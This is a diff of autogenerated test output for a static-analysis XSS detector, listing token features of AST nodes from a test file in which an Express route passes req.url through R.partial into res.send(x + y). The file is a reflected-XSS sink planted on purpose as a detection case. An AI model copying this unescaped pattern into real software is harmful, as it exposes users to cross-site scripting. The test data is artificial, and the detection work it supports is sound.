forEach | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/partial.js:32:13:32:19 | forEach | fileImports | express lodash ramda underscore | | autogenerated/Xss/ReflectedXss/partial.js:32:21:32:28 | callback | CalleeFlexibleAccessPath | ?.forEach | | autogenerated/Xss/ReflectedXss/partial.js:32:21:32:28 | callback | InputArgumentIndex | 0 | | autogenerated/Xss/ReflectedXss/partial.js:32:21:32:28 | callback | contextFunctionInterfaces | getFirst(x, y)\nsendResponse(x, y)\nsendResponse(x, y)\nsendResponse(x, y)\nsendResponse(x, y) | @@ -21705,6 +144544,21 @@ tokenFeatures | autogenerated/Xss/ReflectedXss/partial.js:32:21:32:28 | callback | enclosingFunctionBody | req res sendResponse x y res send x y callback lodash partial sendResponse req url 1 2 3 forEach callback | | autogenerated/Xss/ReflectedXss/partial.js:32:21:32:28 | callback | enclosingFunctionName | app.get#functionalargument | | autogenerated/Xss/ReflectedXss/partial.js:32:21:32:28 | callback | fileImports | express lodash ramda underscore | +| autogenerated/Xss/ReflectedXss/partial.js:35:1:35:3 | app | contextFunctionInterfaces | getFirst(x, y)\nsendResponse(x, y)\nsendResponse(x, y)\nsendResponse(x, y)\nsendResponse(x, y) | +| autogenerated/Xss/ReflectedXss/partial.js:35:1:35:3 | app | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/partial.js:35:1:35:3 | app | fileImports | express lodash ramda underscore | +| autogenerated/Xss/ReflectedXss/partial.js:35:1:35:7 | app.get | contextFunctionInterfaces | getFirst(x, y)\nsendResponse(x, y)\nsendResponse(x, y)\nsendResponse(x, y)\nsendResponse(x, y) | +| autogenerated/Xss/ReflectedXss/partial.js:35:1:35:7 | app.get | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/partial.js:35:1:35:7 | app.get | fileImports | express lodash ramda underscore | +| autogenerated/Xss/ReflectedXss/partial.js:35:1:42:2 | app.get ... ck);\\n}) | contextFunctionInterfaces | getFirst(x, y)\nsendResponse(x, y)\nsendResponse(x, y)\nsendResponse(x, y)\nsendResponse(x, y) | +| autogenerated/Xss/ReflectedXss/partial.js:35:1:42:2 | app.get ... ck);\\n}) | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/partial.js:35:1:42:2 | app.get ... ck);\\n}) | fileImports | express lodash ramda underscore | +| autogenerated/Xss/ReflectedXss/partial.js:35:1:42:2 | exceptional return of app.get ... ck);\\n}) | contextFunctionInterfaces | getFirst(x, y)\nsendResponse(x, y)\nsendResponse(x, y)\nsendResponse(x, y)\nsendResponse(x, y) | +| autogenerated/Xss/ReflectedXss/partial.js:35:1:42:2 | exceptional return of app.get ... ck);\\n}) | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/partial.js:35:1:42:2 | exceptional return of app.get ... ck);\\n}) | fileImports | express lodash ramda underscore | +| autogenerated/Xss/ReflectedXss/partial.js:35:5:35:7 | get | contextFunctionInterfaces | getFirst(x, y)\nsendResponse(x, y)\nsendResponse(x, y)\nsendResponse(x, y)\nsendResponse(x, y) | +| autogenerated/Xss/ReflectedXss/partial.js:35:5:35:7 | get | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/partial.js:35:5:35:7 | get | fileImports | express lodash ramda underscore | | autogenerated/Xss/ReflectedXss/partial.js:35:9:35:16 | "/ramda" | CalleeFlexibleAccessPath | app.get | | autogenerated/Xss/ReflectedXss/partial.js:35:9:35:16 | "/ramda" | InputArgumentIndex | 0 | | autogenerated/Xss/ReflectedXss/partial.js:35:9:35:16 | "/ramda" | calleeImports | express | @@ -21712,6 +144566,21 @@ tokenFeatures | autogenerated/Xss/ReflectedXss/partial.js:35:9:35:16 | "/ramda" | contextSurroundingFunctionParameters | | | autogenerated/Xss/ReflectedXss/partial.js:35:9:35:16 | "/ramda" | fileImports | express lodash ramda underscore | | autogenerated/Xss/ReflectedXss/partial.js:35:9:35:16 | "/ramda" | receiverName | app | +| autogenerated/Xss/ReflectedXss/partial.js:35:19:35:18 | R | contextFunctionInterfaces | getFirst(x, y)\nsendResponse(x, y)\nsendResponse(x, y)\nsendResponse(x, y)\nsendResponse(x, y) | +| autogenerated/Xss/ReflectedXss/partial.js:35:19:35:18 | R | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/partial.js:35:19:35:18 | R | enclosingFunctionBody | req res sendResponse x y res send x y callback R partial sendResponse req url 1 2 3 forEach callback | +| autogenerated/Xss/ReflectedXss/partial.js:35:19:35:18 | R | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/partial.js:35:19:35:18 | R | fileImports | express lodash ramda underscore | +| autogenerated/Xss/ReflectedXss/partial.js:35:19:35:19 | res | contextFunctionInterfaces | getFirst(x, y)\nsendResponse(x, y)\nsendResponse(x, y)\nsendResponse(x, y)\nsendResponse(x, y) | +| autogenerated/Xss/ReflectedXss/partial.js:35:19:35:19 | res | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/partial.js:35:19:35:19 | res | enclosingFunctionBody | req res sendResponse x y res send x y callback R partial sendResponse req url 1 2 3 forEach callback | +| autogenerated/Xss/ReflectedXss/partial.js:35:19:35:19 | res | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/partial.js:35:19:35:19 | res | fileImports | express lodash ramda underscore | +| autogenerated/Xss/ReflectedXss/partial.js:35:19:42:1 | 'arguments' object of anonymous function | contextFunctionInterfaces | getFirst(x, y)\nsendResponse(x, y)\nsendResponse(x, y)\nsendResponse(x, y)\nsendResponse(x, y) | +| autogenerated/Xss/ReflectedXss/partial.js:35:19:42:1 | 'arguments' object of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/partial.js:35:19:42:1 | 'arguments' object of anonymous function | enclosingFunctionBody | req res sendResponse x y res send x y callback R partial sendResponse req url 1 2 3 forEach callback | +| autogenerated/Xss/ReflectedXss/partial.js:35:19:42:1 | 'arguments' object of anonymous function | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/partial.js:35:19:42:1 | 'arguments' object of anonymous function | fileImports | express lodash ramda underscore | | autogenerated/Xss/ReflectedXss/partial.js:35:19:42:1 | (req, r ... ack);\\n} | CalleeFlexibleAccessPath | app.get | | autogenerated/Xss/ReflectedXss/partial.js:35:19:42:1 | (req, r ... ack);\\n} | InputArgumentIndex | 1 | | autogenerated/Xss/ReflectedXss/partial.js:35:19:42:1 | (req, r ... ack);\\n} | calleeImports | express | @@ -21719,6 +144588,130 @@ tokenFeatures | autogenerated/Xss/ReflectedXss/partial.js:35:19:42:1 | (req, r ... ack);\\n} | contextSurroundingFunctionParameters | (req, res) | | autogenerated/Xss/ReflectedXss/partial.js:35:19:42:1 | (req, r ... ack);\\n} | fileImports | express lodash ramda underscore | | autogenerated/Xss/ReflectedXss/partial.js:35:19:42:1 | (req, r ... ack);\\n} | receiverName | app | +| autogenerated/Xss/ReflectedXss/partial.js:35:19:42:1 | exceptional return of anonymous function | contextFunctionInterfaces | getFirst(x, y)\nsendResponse(x, y)\nsendResponse(x, y)\nsendResponse(x, y)\nsendResponse(x, y) | +| autogenerated/Xss/ReflectedXss/partial.js:35:19:42:1 | exceptional return of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/partial.js:35:19:42:1 | exceptional return of anonymous function | enclosingFunctionBody | req res sendResponse x y res send x y callback R partial sendResponse req url 1 2 3 forEach callback | +| autogenerated/Xss/ReflectedXss/partial.js:35:19:42:1 | exceptional return of anonymous function | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/partial.js:35:19:42:1 | exceptional return of anonymous function | fileImports | express lodash ramda underscore | +| autogenerated/Xss/ReflectedXss/partial.js:35:19:42:1 | return of anonymous function | contextFunctionInterfaces | getFirst(x, y)\nsendResponse(x, y)\nsendResponse(x, y)\nsendResponse(x, y)\nsendResponse(x, y) | +| autogenerated/Xss/ReflectedXss/partial.js:35:19:42:1 | return of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/partial.js:35:19:42:1 | return of anonymous function | enclosingFunctionBody | req res sendResponse x y res send x y callback R partial sendResponse req url 1 2 3 forEach callback | +| autogenerated/Xss/ReflectedXss/partial.js:35:19:42:1 | return of anonymous function | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/partial.js:35:19:42:1 | return of anonymous function | fileImports | express lodash ramda underscore | +| autogenerated/Xss/ReflectedXss/partial.js:35:20:35:22 | req | contextFunctionInterfaces | getFirst(x, y)\nsendResponse(x, y)\nsendResponse(x, y)\nsendResponse(x, y)\nsendResponse(x, y) | +| autogenerated/Xss/ReflectedXss/partial.js:35:20:35:22 | req | contextFunctionInterfaces | getFirst(x, y)\nsendResponse(x, y)\nsendResponse(x, y)\nsendResponse(x, y)\nsendResponse(x, y) | +| autogenerated/Xss/ReflectedXss/partial.js:35:20:35:22 | req | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/partial.js:35:20:35:22 | req | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/partial.js:35:20:35:22 | req | enclosingFunctionBody | req res sendResponse x y res send x y callback R partial sendResponse req url 1 2 3 forEach callback | +| autogenerated/Xss/ReflectedXss/partial.js:35:20:35:22 | req | enclosingFunctionBody | req res sendResponse x y res send x y callback R partial sendResponse req url 1 2 3 forEach callback | +| autogenerated/Xss/ReflectedXss/partial.js:35:20:35:22 | req | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/partial.js:35:20:35:22 | req | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/partial.js:35:20:35:22 | req | fileImports | express lodash ramda underscore | +| autogenerated/Xss/ReflectedXss/partial.js:35:20:35:22 | req | fileImports | express lodash ramda underscore | +| autogenerated/Xss/ReflectedXss/partial.js:35:25:35:27 | res | contextFunctionInterfaces | getFirst(x, y)\nsendResponse(x, y)\nsendResponse(x, y)\nsendResponse(x, y)\nsendResponse(x, y) | +| autogenerated/Xss/ReflectedXss/partial.js:35:25:35:27 | res | contextFunctionInterfaces | getFirst(x, y)\nsendResponse(x, y)\nsendResponse(x, y)\nsendResponse(x, y)\nsendResponse(x, y) | +| autogenerated/Xss/ReflectedXss/partial.js:35:25:35:27 | res | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/partial.js:35:25:35:27 | res | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/partial.js:35:25:35:27 | res | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/partial.js:35:25:35:27 | res | enclosingFunctionBody | req res sendResponse x y res send x y callback R partial sendResponse req url 1 2 3 forEach callback | +| autogenerated/Xss/ReflectedXss/partial.js:35:25:35:27 | res | enclosingFunctionBody | req res sendResponse x y res send x y callback R partial sendResponse req url 1 2 3 forEach callback | +| autogenerated/Xss/ReflectedXss/partial.js:35:25:35:27 | res | enclosingFunctionBody | req res sendResponse x y res send x y callback R partial sendResponse req url 1 2 3 forEach callback | +| autogenerated/Xss/ReflectedXss/partial.js:35:25:35:27 | res | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/partial.js:35:25:35:27 | res | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/partial.js:35:25:35:27 | res | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/partial.js:35:25:35:27 | res | fileImports | express lodash ramda underscore | +| autogenerated/Xss/ReflectedXss/partial.js:35:25:35:27 | res | fileImports | express lodash ramda underscore | +| autogenerated/Xss/ReflectedXss/partial.js:36:3:36:2 | res | contextFunctionInterfaces | getFirst(x, y)\nsendResponse(x, y)\nsendResponse(x, y)\nsendResponse(x, y)\nsendResponse(x, y) | +| autogenerated/Xss/ReflectedXss/partial.js:36:3:36:2 | res | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/partial.js:36:3:36:2 | res | enclosingFunctionBody | req res sendResponse x y res send x y callback R partial sendResponse req url 1 2 3 forEach callback | +| autogenerated/Xss/ReflectedXss/partial.js:36:3:36:2 | res | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/partial.js:36:3:36:2 | res | fileImports | express lodash ramda underscore | +| autogenerated/Xss/ReflectedXss/partial.js:36:3:36:2 | this | contextFunctionInterfaces | getFirst(x, y)\nsendResponse(x, y)\nsendResponse(x, y)\nsendResponse(x, y)\nsendResponse(x, y) | +| autogenerated/Xss/ReflectedXss/partial.js:36:3:36:2 | this | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/partial.js:36:3:36:2 | this | enclosingFunctionBody | req res sendResponse x y res send x y callback R partial sendResponse req url 1 2 3 forEach callback | +| autogenerated/Xss/ReflectedXss/partial.js:36:3:36:2 | this | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/partial.js:36:3:36:2 | this | fileImports | express lodash ramda underscore | +| autogenerated/Xss/ReflectedXss/partial.js:36:3:38:3 | 'arguments' object of function sendResponse | contextFunctionInterfaces | getFirst(x, y)\nsendResponse(x, y)\nsendResponse(x, y)\nsendResponse(x, y)\nsendResponse(x, y) | +| autogenerated/Xss/ReflectedXss/partial.js:36:3:38:3 | 'arguments' object of function sendResponse | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/partial.js:36:3:38:3 | 'arguments' object of function sendResponse | enclosingFunctionBody | req res sendResponse x y res send x y callback R partial sendResponse req url 1 2 3 forEach callback | +| autogenerated/Xss/ReflectedXss/partial.js:36:3:38:3 | 'arguments' object of function sendResponse | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/partial.js:36:3:38:3 | 'arguments' object of function sendResponse | fileImports | express lodash ramda underscore | +| autogenerated/Xss/ReflectedXss/partial.js:36:3:38:3 | exceptional return of function sendResponse | contextFunctionInterfaces | getFirst(x, y)\nsendResponse(x, y)\nsendResponse(x, y)\nsendResponse(x, y)\nsendResponse(x, y) | +| autogenerated/Xss/ReflectedXss/partial.js:36:3:38:3 | exceptional return of function sendResponse | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/partial.js:36:3:38:3 | exceptional return of function sendResponse | enclosingFunctionBody | req res sendResponse x y res send x y callback R partial sendResponse req url 1 2 3 forEach callback | +| autogenerated/Xss/ReflectedXss/partial.js:36:3:38:3 | exceptional return of function sendResponse | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/partial.js:36:3:38:3 | exceptional return of function sendResponse | fileImports | express lodash ramda underscore | +| autogenerated/Xss/ReflectedXss/partial.js:36:3:38:3 | functio ... OK\\n } | contextFunctionInterfaces | getFirst(x, y)\nsendResponse(x, y)\nsendResponse(x, y)\nsendResponse(x, y)\nsendResponse(x, y) | +| autogenerated/Xss/ReflectedXss/partial.js:36:3:38:3 | functio ... OK\\n } | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/partial.js:36:3:38:3 | functio ... OK\\n } | enclosingFunctionBody | req res sendResponse x y res send x y callback R partial sendResponse req url 1 2 3 forEach callback | +| autogenerated/Xss/ReflectedXss/partial.js:36:3:38:3 | functio ... OK\\n } | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/partial.js:36:3:38:3 | functio ... OK\\n } | fileImports | express lodash ramda underscore | +| autogenerated/Xss/ReflectedXss/partial.js:36:3:38:3 | return of function sendResponse | contextFunctionInterfaces | getFirst(x, y)\nsendResponse(x, y)\nsendResponse(x, y)\nsendResponse(x, y)\nsendResponse(x, y) | +| autogenerated/Xss/ReflectedXss/partial.js:36:3:38:3 | return of function sendResponse | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/partial.js:36:3:38:3 | return of function sendResponse | enclosingFunctionBody | req res sendResponse x y res send x y callback R partial sendResponse req url 1 2 3 forEach callback | +| autogenerated/Xss/ReflectedXss/partial.js:36:3:38:3 | return of function sendResponse | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/partial.js:36:3:38:3 | return of function sendResponse | fileImports | express lodash ramda underscore | +| autogenerated/Xss/ReflectedXss/partial.js:36:12:36:23 | sendResponse | contextFunctionInterfaces | getFirst(x, y)\nsendResponse(x, y)\nsendResponse(x, y)\nsendResponse(x, y)\nsendResponse(x, y) | +| autogenerated/Xss/ReflectedXss/partial.js:36:12:36:23 | sendResponse | contextFunctionInterfaces | getFirst(x, y)\nsendResponse(x, y)\nsendResponse(x, y)\nsendResponse(x, y)\nsendResponse(x, y) | +| autogenerated/Xss/ReflectedXss/partial.js:36:12:36:23 | sendResponse | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/partial.js:36:12:36:23 | sendResponse | contextSurroundingFunctionParameters | (x, y) | +| autogenerated/Xss/ReflectedXss/partial.js:36:12:36:23 | sendResponse | enclosingFunctionBody | req res sendResponse x y res send x y callback R partial sendResponse req url 1 2 3 forEach callback | +| autogenerated/Xss/ReflectedXss/partial.js:36:12:36:23 | sendResponse | enclosingFunctionBody | req res sendResponse x y res send x y callback R partial sendResponse req url 1 2 3 forEach callback | +| autogenerated/Xss/ReflectedXss/partial.js:36:12:36:23 | sendResponse | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/partial.js:36:12:36:23 | sendResponse | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/partial.js:36:12:36:23 | sendResponse | fileImports | express lodash ramda underscore | +| autogenerated/Xss/ReflectedXss/partial.js:36:12:36:23 | sendResponse | fileImports | express lodash ramda underscore | +| autogenerated/Xss/ReflectedXss/partial.js:36:25:36:25 | x | contextFunctionInterfaces | getFirst(x, y)\nsendResponse(x, y)\nsendResponse(x, y)\nsendResponse(x, y)\nsendResponse(x, y) | +| autogenerated/Xss/ReflectedXss/partial.js:36:25:36:25 | x | contextFunctionInterfaces | getFirst(x, y)\nsendResponse(x, y)\nsendResponse(x, y)\nsendResponse(x, y)\nsendResponse(x, y) | +| autogenerated/Xss/ReflectedXss/partial.js:36:25:36:25 | x | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/partial.js:36:25:36:25 | x | contextSurroundingFunctionParameters | (x, y) | +| autogenerated/Xss/ReflectedXss/partial.js:36:25:36:25 | x | enclosingFunctionBody | req res sendResponse x y res send x y callback R partial sendResponse req url 1 2 3 forEach callback | +| autogenerated/Xss/ReflectedXss/partial.js:36:25:36:25 | x | enclosingFunctionBody | req res sendResponse x y res send x y callback R partial sendResponse req url 1 2 3 forEach callback | +| autogenerated/Xss/ReflectedXss/partial.js:36:25:36:25 | x | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/partial.js:36:25:36:25 | x | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/partial.js:36:25:36:25 | x | fileImports | express lodash ramda underscore | +| autogenerated/Xss/ReflectedXss/partial.js:36:25:36:25 | x | fileImports | express lodash ramda underscore | +| autogenerated/Xss/ReflectedXss/partial.js:36:28:36:28 | y | contextFunctionInterfaces | getFirst(x, y)\nsendResponse(x, y)\nsendResponse(x, y)\nsendResponse(x, y)\nsendResponse(x, y) | +| autogenerated/Xss/ReflectedXss/partial.js:36:28:36:28 | y | contextFunctionInterfaces | getFirst(x, y)\nsendResponse(x, y)\nsendResponse(x, y)\nsendResponse(x, y)\nsendResponse(x, y) | +| autogenerated/Xss/ReflectedXss/partial.js:36:28:36:28 | y | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/partial.js:36:28:36:28 | y | contextSurroundingFunctionParameters | (x, y) | +| autogenerated/Xss/ReflectedXss/partial.js:36:28:36:28 | y | enclosingFunctionBody | req res sendResponse x y res send x y callback R partial sendResponse req url 1 2 3 forEach callback | +| autogenerated/Xss/ReflectedXss/partial.js:36:28:36:28 | y | enclosingFunctionBody | req res sendResponse x y res send x y callback R partial sendResponse req url 1 2 3 forEach callback | +| autogenerated/Xss/ReflectedXss/partial.js:36:28:36:28 | y | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/partial.js:36:28:36:28 | y | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/partial.js:36:28:36:28 | y | fileImports | express lodash ramda underscore | +| autogenerated/Xss/ReflectedXss/partial.js:36:28:36:28 | y | fileImports | express lodash ramda underscore | +| autogenerated/Xss/ReflectedXss/partial.js:37:5:37:7 | res | contextFunctionInterfaces | getFirst(x, y)\nsendResponse(x, y)\nsendResponse(x, y)\nsendResponse(x, y)\nsendResponse(x, y) | +| autogenerated/Xss/ReflectedXss/partial.js:37:5:37:7 | res | contextSurroundingFunctionParameters | (x, y) | +| autogenerated/Xss/ReflectedXss/partial.js:37:5:37:7 | res | enclosingFunctionBody | req res sendResponse x y res send x y callback R partial sendResponse req url 1 2 3 forEach callback | +| autogenerated/Xss/ReflectedXss/partial.js:37:5:37:7 | res | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/partial.js:37:5:37:7 | res | fileImports | express lodash ramda underscore | +| autogenerated/Xss/ReflectedXss/partial.js:37:5:37:12 | res.send | contextFunctionInterfaces | getFirst(x, y)\nsendResponse(x, y)\nsendResponse(x, y)\nsendResponse(x, y)\nsendResponse(x, y) | +| autogenerated/Xss/ReflectedXss/partial.js:37:5:37:12 | res.send | contextSurroundingFunctionParameters | (x, y) | +| autogenerated/Xss/ReflectedXss/partial.js:37:5:37:12 | res.send | enclosingFunctionBody | req res sendResponse x y res send x y callback R partial sendResponse req url 1 2 3 forEach callback | +| autogenerated/Xss/ReflectedXss/partial.js:37:5:37:12 | res.send | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/partial.js:37:5:37:12 | res.send | fileImports | express lodash ramda underscore | +| autogenerated/Xss/ReflectedXss/partial.js:37:5:37:19 | exceptional return of res.send(x + y) | contextFunctionInterfaces | getFirst(x, y)\nsendResponse(x, y)\nsendResponse(x, y)\nsendResponse(x, y)\nsendResponse(x, y) | +| autogenerated/Xss/ReflectedXss/partial.js:37:5:37:19 | exceptional return of res.send(x + y) | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/partial.js:37:5:37:19 | exceptional return of res.send(x + y) | enclosingFunctionBody | req res sendResponse x y res send x y callback R partial sendResponse req url 1 2 3 forEach callback | +| autogenerated/Xss/ReflectedXss/partial.js:37:5:37:19 | exceptional return of res.send(x + y) | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/partial.js:37:5:37:19 | exceptional return of res.send(x + y) | fileImports | express lodash ramda underscore | +| autogenerated/Xss/ReflectedXss/partial.js:37:5:37:19 | res.send(x + y) | contextFunctionInterfaces | getFirst(x, y)\nsendResponse(x, y)\nsendResponse(x, y)\nsendResponse(x, y)\nsendResponse(x, y) | +| autogenerated/Xss/ReflectedXss/partial.js:37:5:37:19 | res.send(x + y) | contextSurroundingFunctionParameters | (x, y) | +| autogenerated/Xss/ReflectedXss/partial.js:37:5:37:19 | res.send(x + y) | enclosingFunctionBody | req res sendResponse x y res send x y callback R partial sendResponse req url 1 2 3 forEach callback | +| autogenerated/Xss/ReflectedXss/partial.js:37:5:37:19 | res.send(x + y) | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/partial.js:37:5:37:19 | res.send(x + y) | fileImports | express lodash ramda underscore | +| autogenerated/Xss/ReflectedXss/partial.js:37:9:37:12 | send | contextFunctionInterfaces | getFirst(x, y)\nsendResponse(x, y)\nsendResponse(x, y)\nsendResponse(x, y)\nsendResponse(x, y) | +| autogenerated/Xss/ReflectedXss/partial.js:37:9:37:12 | send | contextSurroundingFunctionParameters | (x, y) | +| autogenerated/Xss/ReflectedXss/partial.js:37:9:37:12 | send | enclosingFunctionBody | req res sendResponse x y res send x y callback R partial sendResponse req url 1 2 3 forEach callback | +| autogenerated/Xss/ReflectedXss/partial.js:37:9:37:12 | send | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/partial.js:37:9:37:12 | send | fileImports | express lodash ramda underscore | +| autogenerated/Xss/ReflectedXss/partial.js:37:14:37:14 | x | contextFunctionInterfaces | getFirst(x, y)\nsendResponse(x, y)\nsendResponse(x, y)\nsendResponse(x, y)\nsendResponse(x, y) | +| autogenerated/Xss/ReflectedXss/partial.js:37:14:37:14 | x | contextSurroundingFunctionParameters | (x, y) | +| autogenerated/Xss/ReflectedXss/partial.js:37:14:37:14 | x | enclosingFunctionBody | req res sendResponse x y res send x y callback R partial sendResponse req url 1 2 3 forEach callback | +| autogenerated/Xss/ReflectedXss/partial.js:37:14:37:14 | x | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/partial.js:37:14:37:14 | x | fileImports | express lodash ramda underscore | +| autogenerated/Xss/ReflectedXss/partial.js:37:14:37:14 | x | stringConcatenatedWith | -endpoint- y | | autogenerated/Xss/ReflectedXss/partial.js:37:14:37:18 | x + y | CalleeFlexibleAccessPath | res.send | | autogenerated/Xss/ReflectedXss/partial.js:37:14:37:18 | x + y | InputArgumentIndex | 0 | | autogenerated/Xss/ReflectedXss/partial.js:37:14:37:18 | x + y | contextFunctionInterfaces | getFirst(x, y)\nsendResponse(x, y)\nsendResponse(x, y)\nsendResponse(x, y)\nsendResponse(x, y) | @@ -21727,6 +144720,52 @@ tokenFeatures | autogenerated/Xss/ReflectedXss/partial.js:37:14:37:18 | x + y | enclosingFunctionName | app.get#functionalargument | | autogenerated/Xss/ReflectedXss/partial.js:37:14:37:18 | x + y | fileImports | express lodash ramda underscore | | autogenerated/Xss/ReflectedXss/partial.js:37:14:37:18 | x + y | receiverName | res | +| autogenerated/Xss/ReflectedXss/partial.js:37:18:37:18 | y | contextFunctionInterfaces | getFirst(x, y)\nsendResponse(x, y)\nsendResponse(x, y)\nsendResponse(x, y)\nsendResponse(x, y) | +| autogenerated/Xss/ReflectedXss/partial.js:37:18:37:18 | y | contextSurroundingFunctionParameters | (x, y) | +| autogenerated/Xss/ReflectedXss/partial.js:37:18:37:18 | y | enclosingFunctionBody | req res sendResponse x y res send x y callback R partial sendResponse req url 1 2 3 forEach callback | +| autogenerated/Xss/ReflectedXss/partial.js:37:18:37:18 | y | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/partial.js:37:18:37:18 | y | fileImports | express lodash ramda underscore | +| autogenerated/Xss/ReflectedXss/partial.js:37:18:37:18 | y | stringConcatenatedWith | x -endpoint- | +| autogenerated/Xss/ReflectedXss/partial.js:40:7:40:14 | callback | contextFunctionInterfaces | getFirst(x, y)\nsendResponse(x, y)\nsendResponse(x, y)\nsendResponse(x, y)\nsendResponse(x, y) | +| autogenerated/Xss/ReflectedXss/partial.js:40:7:40:14 | callback | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/partial.js:40:7:40:14 | callback | enclosingFunctionBody | req res sendResponse x y res send x y callback R partial sendResponse req url 1 2 3 forEach callback | +| autogenerated/Xss/ReflectedXss/partial.js:40:7:40:14 | callback | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/partial.js:40:7:40:14 | callback | fileImports | express lodash ramda underscore | +| autogenerated/Xss/ReflectedXss/partial.js:40:7:40:51 | callbac ... q.url]) | contextFunctionInterfaces | getFirst(x, y)\nsendResponse(x, y)\nsendResponse(x, y)\nsendResponse(x, y)\nsendResponse(x, y) | +| autogenerated/Xss/ReflectedXss/partial.js:40:7:40:51 | callbac ... q.url]) | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/partial.js:40:7:40:51 | callbac ... q.url]) | enclosingFunctionBody | req res sendResponse x y res send x y callback R partial sendResponse req url 1 2 3 forEach callback | +| autogenerated/Xss/ReflectedXss/partial.js:40:7:40:51 | callbac ... q.url]) | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/partial.js:40:7:40:51 | callbac ... q.url]) | fileImports | express lodash ramda underscore | +| autogenerated/Xss/ReflectedXss/partial.js:40:7:40:51 | callback | contextFunctionInterfaces | getFirst(x, y)\nsendResponse(x, y)\nsendResponse(x, y)\nsendResponse(x, y)\nsendResponse(x, y) | +| autogenerated/Xss/ReflectedXss/partial.js:40:7:40:51 | callback | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/partial.js:40:7:40:51 | callback | enclosingFunctionBody | req res sendResponse x y res send x y callback R partial sendResponse req url 1 2 3 forEach callback | +| autogenerated/Xss/ReflectedXss/partial.js:40:7:40:51 | callback | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/partial.js:40:7:40:51 | callback | fileImports | express lodash ramda underscore | +| autogenerated/Xss/ReflectedXss/partial.js:40:18:40:18 | R | contextFunctionInterfaces | getFirst(x, y)\nsendResponse(x, y)\nsendResponse(x, y)\nsendResponse(x, y)\nsendResponse(x, y) | +| autogenerated/Xss/ReflectedXss/partial.js:40:18:40:18 | R | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/partial.js:40:18:40:18 | R | enclosingFunctionBody | req res sendResponse x y res send x y callback R partial sendResponse req url 1 2 3 forEach callback | +| autogenerated/Xss/ReflectedXss/partial.js:40:18:40:18 | R | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/partial.js:40:18:40:18 | R | fileImports | express lodash ramda underscore | +| autogenerated/Xss/ReflectedXss/partial.js:40:18:40:26 | R.partial | contextFunctionInterfaces | getFirst(x, 